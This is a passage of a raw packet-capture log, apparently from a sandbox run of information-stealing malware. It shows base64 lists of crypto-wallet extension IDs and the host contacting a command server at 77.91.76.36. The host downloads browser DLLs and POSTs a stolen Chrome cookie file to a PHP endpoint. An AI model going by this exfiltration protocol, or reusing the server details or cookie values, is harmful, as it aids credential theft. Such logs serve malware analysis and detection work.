Z2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIF
Dec 24, 2023 10:44:50.062325954 CET	1286	IN	Data Raw: 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e Data Ascii: dhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZ
Dec 24, 2023 10:44:50.062520981 CET	1286	IN	Data Raw: 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 Data Ascii: cmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramV
Dec 24, 2023 10:44:50.062724113 CET	1286	IN	Data Raw: 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 Data Ascii: xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ
Dec 24, 2023 10:44:50.062786102 CET	464	IN	Data Raw: 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d Data Ascii: bXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxTYWZlUGFsIEV4dGVuc2lvbiBXYWxsZXR8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8QmFja3BhY2t8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2x
Dec 24, 2023 10:44:50.276571989 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC Host: 77.91.76.36 Content-Length: 6047 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:44:50.276623964 CET	6047	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 24, 2023 10:44:51.516271114 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:44:52.042275906 CET	90	OUT	GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:44:52.435858965 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:52 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Dec 24, 2023 10:44:52.441529989 CET	1286	IN	Data Raw: 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B/81s:<R@B/92P @B
Dec 24, 2023 10:44:52.451231003 CET	1286	IN	Data Raw: 5d c3 8d b4 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 Data Ascii: ]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Dec 24, 2023 10:44:52.461170912 CET	1286	IN	Data Raw: 08 85 d2 74 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 Data Ascii: tB]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
Dec 24, 2023 10:44:52.471092939 CET	1286	IN	Data Raw: 18 83 e3 7f c7 42 04 00 00 00 00 b0 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f Data Ascii: BLpuBpuBxMMuMZ2Mx]uZxu
Dec 24, 2023 10:44:55.283421993 CET	949	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC Host: 77.91.76.36 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------CAEBGHDBKEBGIDHJJEHC--
Dec 24, 2023 10:44:56.311531067 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:44:56.509948015 CET	553	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC Host: 77.91.76.36 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file"------KEGDAKEHJDHIDHJJDAEC--
Dec 24, 2023 10:44:57.055485964 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:00.408607006 CET	553	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 77.91.76.36 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
Dec 24, 2023 10:45:00.815664053 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:01.629720926 CET	90	OUT	GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:45:02.024420977 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:01 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 24, 2023 10:45:02.416064978 CET	90	OUT	GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1 Host: 77.91.76.36 Cache-Control: no-cache
Dec 24, 2023 10:45:02.805766106 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:02 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 